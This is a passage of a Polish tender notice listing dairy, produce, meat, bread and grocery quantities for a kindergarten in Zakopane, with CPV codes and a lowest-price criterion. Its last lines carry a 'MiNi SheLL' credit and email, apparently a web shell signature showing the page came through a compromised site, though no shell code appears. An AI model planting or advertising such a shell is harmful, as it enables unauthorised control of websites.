l.p.	Nazwa	jm	ilość
1.	Maślanka naturalna	kg	40
2.	Mleko świeże typu Mlekowita (luz)2,5% t lub równoważne	l.	3000
3.	Masło ekstra 82% tłuszczu 200g typu Mlekowita lub równoważne	szt.	700
4.	Twaróg półtłusty wiejski 200g typu Mlekowita lub równoważne	kg	250
5.	Serek homog. owocowy 135g (typu Darek Mlekowita) lub równoważny  MIX	szt.	600
6.	Ser żółty (edamski) typu Mlekowita lub równoważny	kg	20
7.	Jogurt typu Jogobella 150g (mix) lub równoważny	szt.	600
8.	Śmietana 400ml. 18 % typu Mlekowita lub równoważna	szt	720
9.	Serek topiony l00g krem typu Mlekowita lub równoważna	kg	25
10.	Margaryna mleczna typu Mlekowita 250 g lub równoważna	kg	55
11.	Kefir naturalny 2% typu Mlekowita lub równoważny	1.	    70
12.	Ser żółty (Prymus,Dziurdamer)	kg.	30
13.	Mleko spożywcze Polskie 2% tł. top	l.	500
14.	Śmietanka 30%200ml. z Mlekowity	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.55.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  owoców i warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.	Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27

 Zakres zamówienia obejmuje : 

Lp.	Nazwa	jm.	ilość
1	Banany	Kg.	240
2	Buraki ćwikłowe	Kg.	250
3	Cebula	Kg.	200
4	Cytryny	Kg.	50
5	Fasola Jaś 0,5 kg	Kg.	40
6	Groch łuszczony połówki 0,5 kg	Kg.	25
7	Gruszki	Kg.	300
8	Jabłka deserowe	Kg.	500
9	Maliny (400g)	Szt.	50
10	Kalafior	Szt.	40
11	Kapusta biała	Kg.	190
12	Kapusta czerwona	Kg.	60
13	Kapusta kwaszona	Kg.	220
14	Mandarynki	Kg.	80
15	Marchew korzeń	Kg.	420
16	Ogórek kwaszony 400g	Szt.	72
17	Ogórek świeży	Kg.	80
18	Papryka świeża	Kg.	35
19	Pieczarki	Kg.	30
20	Pietruszka korzeń	Kg.	120
21	Pomidor	Kg.	100
22	Rzodkiewka	Pęcz.	120
23	Sałata zielona	Szt.	140
24	Seler	Kg.	100
25	Szczypior	Pęcz.	120
26	Śliwki	Kg.	50
27	Ziemniaki	Kg.	4000
28	Pietruszka natka 25g	Pęcz.	400
29	Por	Szt.	70
30	Koperek zielony	Pęcz.	400
31	Kapusta pekińska	Szt.	100
32	Kapusta włoska	Szt.	75
33	Brokuły	Szt.	25
34	Botwinka	Pęcz.	20
35	Winogrona	Kg.	50
36	Kiwi	Kg.	100
37	Brzoskwinia lub nektarynka	Kg.	90
38	Pomarańcza	Kg.	100
39	Czosnek polski	Szt.	60
40	Truskawki	Kg.	80
41	Arbuz	Kg.	50
42	Ogórek konserwowy słoik 0,9 L.	Szt.	60
43	Jaja kurze XL kl. I	Szt.	3600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu, wyrobów drobiarskich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27

 Zakres zamówienia obejmuje : 

Lp.	Nazwa	j.m.	ilość
1	Karczek bk	kg.	80
2	Kiełbasa szynkowa (wieprzowa)	kg.	25
3	Kiełbasa toruńska	kg.	15
4	Szynka konserwowa wieprzowa	kg.	30
5	Kurczak świeży	kg.	250
6	Serdelki	kg.	80
7	Szynka wiejska wieprzowa	kg.	20
8	Szynka drobiowa,filet z indyka	kg.	10
9	Szynka wieprzowa gotowana	kg.	20
10	Mięso wołowe pieczeniowe	kg.	43
11	Kiełbasa zwyczajna	kg.	60
12	Parówki cielęce	kg.	50
13	Porcja rosołowa drobiowa	kg.	250
14	Schab wieprzowy bkości	kg.	130
15	Szynka wieprzowa bk surowa,kulki	kg.	80
16	Mięso rosołowe wołowe	kg.	50
17	Wątroba drobiowa	kg.	25
18	Łopatka wieprzowa bk	kg.	50
19	Boczek wędzony	kg.	45
20	Filet z indyka	kg.	36
21	Filet z kury	kg.	120
22	Mięso mielone wieprzowo cielęce	kg.	120
23	Mięso wołowe, gulasz, pręga	kg.	60
24	Słonina świeża i wędzona	kg.	50
25	Udziec z indyka	kg.	60
26	Smalec luzem	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.	Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27

 Zakres zamówienia obejmuje : 
Nazwa	jm	ilość
Chleb graham 500 g	szt.	180
Chleb krojony 600g pszenno-żytni	szt.	600
Chałka z kruszonką 600g	szt.	80
Bułka mała kajzerka 0,06	szt.	150
Chleb pszenny 500g 	szt.	600
Drożdżówki mieszane 80g	szt.	1200
Chleb słonecznikowy	szt.	100
Rogaliki z marmoladą 80g	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27
Zakres zamowienia obejmuje 
Lp.	Nazwa	j.m.	ilość
1	Galaretka owocowa 75g (MIX) typu WINIARY lub równoważne	szt.	300
2	Cukier biały l kg ( królewski)	kg	600
3	Cukier puder 0,5 kg	kg	35
4	Cukier waniliowy 32g	szt.	40
5	Dżem słoik 300g (mix) typu Łowicz lub równoważny	szt.	90
6	Groszek konserwowy 400g typu
Kwidzyn lub równoważny	szt.	80
7	Herbata cz. granulowana typu saga 100g lub  saga (mix) owocowa 100g.	szt.	120
8	Kakao ciemne 200gDecamoreno	szt.	30
9	Kasza jęczmienna typu mazurska l kg	kg	100
10	Kawa zbożowa Inka 15Gg lub równoważne	szt.	60
11	Ketchup 250g typu Tortex lub równoważny	szt.	90
12	Konserwa rybna w sosie pomidorowym 170g(szprot)	szt.	120
13	Kukurydza 400g typu Kwidzyn lub równoważna	szt,	50
14	Liść laurowy 7g	szt	30
15	Maggi typu Winiary lub równoważna 11	szt.	66
16	Majeranek 7g	szt.	30
17	Majonez typu kielecki 310 ml lub równoważny	szt.	30
18	Miód wielokwiatowy 400g	szt.	40
19	Płatki śniadaniowe Nestle Kangus 250g lub równoważne	kg	25
20	Kucharek przyprawa do potraw 1 kg	szt.	60
21	Olej kujawski 1l.	szt.	220
22	Pieprz mielony czarny 20g	szt.	100
23	Płatki śniadaniowe kukurydziane 250g	kg	25
24	Przecier pomidorowy 30% typu Bażant 800g lub równoważny	szt.	80
25	Ryż 1 kg biały	kg	130
26	Syrop Malinowy 0,5 1 typu Paola lub równoważny	szt.	35
27	Sól jodowana l kg	kg	150
28	Ziele angielskie 15g	szt.	45
29	Makaron typu Lubella - świderki, kolanka 0,5 kg lub równoważny	szt.	200
30	Makaron nitki Lubella 0,5 kg lub równoważny	szt.	100
31	Płatki owsiane górskie 500g ekstra	kg	15
32	Ciastka kruche różne 2 kg (maślane Babuni) lub równoważne	szt.	60
33	Kminek 30g	szt.	25
34	Kwasek cytrynowy 20g	szt.	40
35	Makaron łazanka mała 0,5 kg typu lubella	szt.	70
36	Przyprawa Delikat do drobiu l kg lub równoważne  Knorr	szt.	5
37	Kasza kukurydziana 0,5kg ( drobna)	kg	25
38	Kasza manna l kg	kg	50
39	Bułka tarta 0,5 kg Wrocławska	kg	110
40	Cynamon 20 g	szt.	15
41	Budyń śmietankowy 38 g bez cukru typu Winiary lub równoważne	szt.	60
42	Kisiel mix typu Winiary 38g bez cukru lub równoważne	szt.	300
43	Mąka ziemniaczana 0, 5 kg	kg	30
44	Makaron Zacierka Babuni 250g.	szt	60
45	Pasztet drobiowy 160g	szt.	120
46	Mąka typ 450 pszenna typu Poznańska lub równoważne	kg	400
47	Sok w kartonie 21 Caprio lub równoważne	szt.	500
48	Szczaw w słoiku 180 g	szt.	60
49	Chrzan tarty typu Polonez 180 g lub równoważne	szt.	30
50	Kompot z czarnej porzeczki 0,9 1	szt.	32
51	Kompot z aronii 0,91	szt.	32
52	Kompot z truskawek 0,91.	szt.	32
53	Przyprawa  Delikat Prymat do mięs i ryb lub równoważne100g.	szt.	30
54	Woda mineralna lekko gazow, typu Muszynianka lub równoważna 1,51	szt.	500
55	Musztarda delikatesowa 180g typu Roleski lub równoważna	szt.	30
56	Krem orzechowy Nutella  lub równoważny230g.	szt.	90
57	Konserwa rybna (tuńczyk w oleju w kawałkach) 175g	szt.	100
58	Wafle różne typu Grześki lub równoważne	szt.	700
59	Żelki jogurtowe  nim 2 - 100g.	szt.	150
60	Morele suszone luz	kg	20
61	Rodzynki sułtańskie 100g.	szt.	15
62	Orzechy włoskie luz	kg.	6
63	Herbatniki bebe(48szt w opakowaniu).	szt	80
64	Makaron MIX  Knorr	kg	30
65	Princpolo 36g. klasyczne	szt.	900
66	Filet z (dorsz,panga,mintaj,morszczuk -schaterpak)	kg	100
67	Kalafior 2,5kg	kg	50
68	Mieszanka jarzynowa 6 składnikowa	kg	55
69	Mieszanka kompotowa 500g.	kg	100
70	Brokuły mrożone	kg	40
71	Szpinak mielony	kg	15
72	Fasola szparagowa 2,5kg	kg	50
73	Miód spadziowy 400g	szt	30
74	Sok owocowyKubuś900ml MIX	szt	1000
75	Czekolada deserowa typu Wawel lub równoważna 100g	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.22.10.00-3, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com